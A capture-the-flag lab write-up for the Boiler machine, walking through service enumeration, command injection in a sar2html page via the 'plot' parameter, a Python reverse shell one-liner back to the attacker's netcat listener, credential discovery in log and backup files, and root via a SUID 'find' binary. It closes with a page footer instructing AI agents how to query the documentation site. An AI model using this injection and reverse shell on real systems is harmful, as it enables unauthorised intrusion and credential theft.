# Boiler CTF ### Boiler CTF is a simple challenge with lots of enumeration to do. As always we start with `sudo nmap -sC -sV -p- -oN scan.txt $IP` and we get an output like this ``` PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.9.166.168 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 1 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 10000/tcp open http MiniServ 1.930 (Webmin httpd) |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1). 55007/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e3:ab:e1:39:2d:95:eb:13:55:16:d6:ce:8d:f9:11:e5 (RSA) | 256 ae:de:f2:bb:b7:8a:00:70:20:74:56:76:25:c0:df:38 (ECDSA) |_ 256 25:25:83:f2:a7:75:8a:a0:46:b2:12:70:04:68:5c:cb (ED25519) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel ``` Let's begin with the first question #### **File extension after anon login** As we can see from the nmap scan, FTP allows anonymous logins. Logging in and listing the directory we can see nothing. ``` ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. 226 Directory send OK. ftp> ``` This means the file is hidden. Simply do `ls -lahs` and it will list all contents (hidden ones too) in a list format. ``` ftp> ls -lahs 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 ftp ftp 4096 Aug 22 2019 . drwxr-xr-x 2 ftp ftp 4096 Aug 22 2019 .. -rw-r--r-- 1 ftp ftp 74 Aug 21 2019 .info.txt 226 Directory send OK. ``` Awesome, we can see that there is a hidden `info.txt` file. With this we get the answer to the first question. Reading the contents inside the `info.txt` file we see a small text that's odd but it's in perfect form of a sentence. ``` Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl! ``` This must be some sort of cipher, in fact it's the simple **ROT13** cipher. You can decode it online to see that the text says. Moving on to the second question ### **What is on the highest port?** Simply look at the nmap scan and you will find the answer. ### **What's running on port 10000?** Again, check the nmap scan. ### **Can you exploit the service running on that port? (yay/nay answer)** To answer this, simply enumerate the service and see if you can find anything. Try reading the **source**, do another **nmap** scan, run **gobuster** and **nikto** to see if you can find anything. ### **What's CMS can you access?** Access the webpage, we are greeted with the default Apache page. This means we have to enumerate in order to find the hidden page. Reading the `robots.txt` file we find a few directories that are of no use, however one thing sticks out ``` 079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075 ``` This one was a little bit tricky to figure it out, however after googling around you have to do a little bit of conversion. `ASCII -> Base64 -> MD5` and you'll decode the text. After that we start **gobuster** to search for hidden content. From the results we get ``` /manual (Status: 301) /joomla (Status: 301) /server-status (Status: 403) ``` After accessing the **/joomla** directory we are greeted with the default page of **Joomla**. First lets start with **Joomscan** () and see what we can dig out. ``` Usage: joomscan [options] --url | -u | The Joomla URL/domain to scan. --enumerate-components | -ec | Try to enumerate components. --cookie | Set cookie. --user-agent | -a | Use the specified User-Agent. --random-agent | -r | Use a random User-Agent. --timeout | Set timeout. --proxy=PROXY | Use a proxy to connect to the target URL Proxy example: --proxy http://127.0.0.1:8080 https://127.0.0.1:443 socks://127.0.0.1:414 --about | About Author --help | -h | This help screen. --version ``` ``` joomscan -u http://$target_ip/joomla -ec ``` From joomscan we get pretty much nothing except the version that Joomla is running on and the default directories. `[++] Joomla 3.9.12dev` I couldn't find anything useful online to exploit that version of Joomla. ### **Keep enumerating, you'll know when you find it.** Let's continue with **gobuster** and see what we can find further. ``` gobuster dir -u http://$target/joomla/ -w /usr/share/wordlists/dirb/common.txt -t 40 -o boiler_ctf-gobuster-joomla-content ``` ``` /.htpasswd (Status: 403) /.htaccess (Status: 403) /.hta (Status: 403) /_database (Status: 301) /_files (Status: 301) /_test (Status: 301) /~www (Status: 301) /administrator (Status: 301) /bin (Status: 301) /build (Status: 301) /cache (Status: 301) /components (Status: 301) /_archive (Status: 301) /images (Status: 301) /includes (Status: 301) /installation (Status: 301) /index.php (Status: 200) /language (Status: 301) /layouts (Status: 301) /libraries (Status: 301) /media (Status: 301) /modules (Status: 301) /plugins (Status: 301) /templates (Status: 301) /tests (Status: 301) /tmp (Status: 301) ``` Looking at what we found, the */\_test* directory seems out of place. Looking the webpage we see that it is **sar2html**. Searching online for **sar2html** exploits we find It tells us that we can do Remote Code Execute through the `?plot=` variable. `http://$target_ip/joomla/_test/index.php?plot=;` Running `ls` will list the directory where it is located in the `Select Host` field. Lets try to get a reverse shell. Start **netcat** on our machine. ``` nc -lvnp 9001 (over 9000 from ippsec) ``` Grab a reverse shell from (I used python) ``` export RHOST="$YOUR_IP";export RPORT=9001;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' ``` And paste the command in the URL. After that we are in. #### **Stabilize shell!** Now once you're in, always stabilize your shell! Run these commands below. ``` python -c 'import pty;pty.spawn("/bin/bash")' ``` This will spawn you in a bash shell. Then ``` export TERM=xterm ``` This will allow you to clear your terminal. After that **background** shell with Ctrl + Z. And in your own shell type ``` stty raw -echo;fg ``` This will allow you to use tab completion and the arrow keys. `fg` will return you back to your shell and just press Enter. ### **The interesting file name in the folder?** Listing the current directory we see an interesting file. ``` www-data@Vulnerable:/var/www/html/joomla/_test$ ls -lahs total 124K 4.0K drwxr-xr-x 3 www-data www-data 4.0K Aug 22 2019 . 4.0K drwxr-xr-x 25 www-data www-data 4.0K Aug 22 2019 .. 56K -rwxr-xr-x 1 www-data www-data 53K Aug 22 2019 index.php 4.0K -rwxr-xr-x 1 www-data www-data 716 Aug 21 2019 log.txt 52K -rwxr-xr-x 1 www-data www-data 52K Mar 19 2019 sar2html 4.0K drwxr-xr-x 3 www-data www-data 4.0K Aug 22 2019 sarFILE ``` Reading the contents of the file we can see that there was an SSH server running and we can see the user `basterd` that logged in with their password! ### **You can complete this with manual enumeration, but do it as you wish** ### **Where was the other users pass stored(no extension, just the name)?** Once we acquired the credentials for the user we can login and go to the `/home` directory. ``` basterd@Vulnerable:/home$ ls -lahs total 16K 4.0K drwxr-xr-x 4 root root 4.0K Aug 22 2019 . 4.0K drwxr-xr-x 22 root root 4.0K Aug 22 2019 .. 4.0K drwxr-x--- 3 basterd basterd 4.0K Aug 22 2019 basterd 4.0K drwxr-x--- 3 stoner stoner 4.0K Jan 17 15:46 stoner ``` We do not have permission to go to `stoner` so lets go to our directory and see what we got there. ``` basterd@Vulnerable:~$ ls -lahs total 16K 4.0K drwxr-x--- 3 basterd basterd 4.0K Aug 22 2019 . 4.0K drwxr-xr-x 4 root root 4.0K Aug 22 2019 .. 4.0K -rwxr-xr-x 1 stoner basterd 699 Aug 21 2019 backup.sh 0 -rw------- 1 basterd basterd 0 Aug 22 2019 .bash_history 4.0K drwx------ 2 basterd basterd 4.0K Aug 22 2019 .cache ``` ### **Where was the other users pass stored(no extension, just the name)?** Reading `backup.sh` we can find the credentials to the other user and login. ### **user.txt** It's in the users home directory. ### **What did you exploit to get the privileged user?** Now let's try to get root. Running ``` stoner@Vulnerable:~$ sudo -l User stoner may run the following commands on Vulnerable: (root) NOPASSWD: /NotThisTime/MessinWithYa ``` We can see nothing but a little joke. Let's start up `LinEnum` () I copied the code and created the script in `/tmp/enum.sh` and executed it with `bash`. One of the interesting things that **LinEnum** found is ``` [+] Possibly interesting SUID files: -r-sr-xr-x 1 root root 232196 Feb 8 2016 /usr/bin/find ``` Awesome! `find` has a SUID bit set and we can run it to get a root shell. We can find out how to exploit it from ### **root.txt** It's located in `/root`. ## Final Thought Boiler CTF was quite an easy challenge rated as Medium difficulty. I had fun doing this challenge, especially discovering the `sar2html` exploit. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://sifu.gitbook.io/sifupwns/thm-writeups/boiler-ctf.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.